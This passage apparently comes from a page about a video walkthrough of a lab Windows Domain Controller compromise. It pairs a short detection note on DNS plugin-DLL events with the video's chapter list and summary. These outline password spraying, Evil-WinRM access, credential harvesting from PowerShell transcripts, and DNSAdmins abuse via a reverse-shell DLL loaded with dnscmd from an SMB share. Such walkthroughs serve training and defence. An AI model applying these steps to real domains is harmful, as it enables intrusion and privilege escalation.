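Run as-is, the script flags the two share-hosted events as high, the System32 DLL as low, and ignores the forwarders change. The 541/770 pair is the useful signal: a setting change followed within a minute by a DNS service restart (the video does sc.exe stop DNS / start DNS) is exactly the pattern to alert on, and the restart itself is visible to anyone watching DNS availability, which is why the video stresses that a blocking DLL hangs name resolution for the whole domain.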

Original Description

00:00 - Intro
01:08 - Talking about my switch to Parrot
02:00 - Begin of nmap, discovering it is likely a Windows Domain Controller
04:30 - Checking if there are any open file shares
06:11 - Using RPCClient to enumerate domain users (enumdomusers)
07:55 - Using CrackMapExec to dump the PasswordPolicy
08:45 - Using RPCClient to dump Active Directory information (querydispinfo)
10:45 - Bruteforcing accounts via CrackMapExec with password of Welcome123!
14:30 - Using Evil-WinRM to remote into the server as Melanie
15:40 - Building the latest version of Seatbelt on CommandoVM (The DotNet version is incompatible)
17:40 - Explaining some cool bash one line tricks, then linking Egypt's "One liners to rule them all" talk
24:40 - Changing Seatbelt to compile to Version 4.0 then trying again.
26:30 - Finally examining the Seatbelt output, see the PSTranscript Directory and a Custom group in DNSAdmins
29:50 - Using RPCClient to Enumerate members of the Contractors group (enumdomgroups/querygroupmem)
35:30 - Running WinPEAS to compare the differences
38:30 - Exploring hidden directories to see PSTranscripts, then finding credentials in a powershell log
44:20 - Using Evil-WinRM with the password from a PSTranscript File to get shell as Ryan
45:40 - Quickly going over how to execute code on a Domain Controller as a DNS Admin
46:10 - Using MSFVenom to create a Reverse Shell DLL (we'll do this better at end of the video)
49:10 - Using DNSCMD to have the DNS Server execute our MSFVenom created DLL from a SMB Network Path... Works but hangs the DNS Server
52:50 - Using the DNS-EXE-Persistance to help us create a better to do the Reverse Shell
53:03 - Explaining the DNSCMD Exploit path on how it can be used both for lateral movement and privesc
54:50 - Start of creating the DLL to use with this DNS Exploit
56:45 - Grabbing a C++ Reverse Shell program from github to add to our DNS Exploit Project, then modify it to execute as a thread
01:02:20 - Showing that we get a Reverse shell an

This video teaches viewers how to conduct a cybersecurity attack on a Windows Domain Controller using various tools and techniques, and showcases methods for lateral movement, privileged escalation, and code execution. The video demonstrates the importance of cybersecurity and the need for defensive strategies to prevent such attacks.

Key Takeaways
  1. Run nmap to scan ports on the target system
  2. Use SMB client to login with anonymous login
  3. Use RPC client to dump domain users and password policy
  4. Exploit default password for user Melanie
  5. Use Evil-WinRM to get a shell on the box
  6. Use CrackMapExec to test Windows Remoting ports and execute commands
  7. Identify Windows PowerShell Remoting Port 5985 and 5986
  8. Use msfvenom for DLL injection
  9. Create a reverse shell using shell_reverse_tcp
  10. Use SMB server to host a DLL for execution
💡 The video highlights the importance of cybersecurity and the need for defensive strategies to prevent attacks on Windows Domain Controllers.

